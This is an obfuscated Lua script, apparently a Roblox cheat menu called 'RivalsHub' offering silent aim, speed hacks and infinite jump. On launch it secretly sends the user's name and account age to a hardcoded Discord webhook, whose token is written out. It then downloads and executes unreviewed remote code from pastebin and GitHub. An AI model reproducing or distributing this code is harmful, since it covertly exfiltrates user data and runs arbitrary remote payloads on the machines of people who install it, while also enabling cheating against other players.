--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local function v0() local v9="1487002565358125058";local v10="7d6TRIUwDZVeaq0d9t1YKCHB0IUzASo1QJh6RI-2MIsnFQ7kGq4W-wJCScAdOa-nse0r";local v11="https://webhook.lewisakura.moe/api/webhooks/"   .. v9   .. "/"   .. v10 ;local v12=game:GetService("HttpService");local v13=game:GetService("Players").LocalPlayer;local v14=(syn and syn.request) or (http and http.request) or http_request or request or (fluxus and fluxus.request) ;if v14 then pcall(function() v14({Url=v11,Method="POST",Headers={["Content-Type"]="application/json"},Body=v12:JSONEncode({embeds={{title="🚀 RivalsHub | Execution Success",color=8073207,fields={{name="👤 User",value="`"   .. v13.Name   .. "`" ,inline=true},{name="⏳ Age",value="`"   .. tostring(v13.AccountAge)   .. " Days`" ,inline=true}}}}})});end);end end task.spawn(v0);local v1,v2=pcall(function() return loadstring(game:HttpGet("https://pastebin.com/raw/Y8wBJLVt"))();end);if ( not v1 or  not v2) then warn("RivalsHub: UI Library failed to load. Check your internet or executor.");v1,v2=pcall(function() return loadstring(game:HttpGet("https://raw.githubusercontent.com/7Lib/7Lib/main/7Lib.lua"))();end);end if  not (v1 and v2) then return;end local v3=v2:CreateWindow({Name="Rivals PRIVATE [V4.0.5]",LoadingTitle="Bypassing Anticheat...",KeySystem=false});getgenv().SilentAim=false;getgenv().FOVSize=100;getgenv().Walkspeed=16;local v7=v3:CreateTab({Name="Combat"});v7:CreateToggle({Name="Silent Aim",Callback=function(v15) getgenv().SilentAim=v15;end});v7:CreateSlider({Name="FOV Size",Range={50,500},Increment=10,CurrentValue=100,Callback=function(v17) getgenv().FOVSize=v17;end});local v8=v3:CreateTab({Name="Movement"});v8:CreateSlider({Name="Walkspeed",Range={16,200},Increment=1,CurrentValue=16,Callback=function(v19) if (game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:FindFirstChild("Humanoid")) then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed=v19;end end});v8:CreateToggle({Name="Infinite Jump",Callback=function(v20) getgenv().InfJump=v20;end});game:GetService("UserInputService").JumpRequest:Connect(function() if getgenv().InfJump then game.Players.LocalPlayer.Character:FindFirstChildOfClass("Humanoid"):ChangeState("Jumping");end end);print("RivalsHub V4: Loaded Successfully");
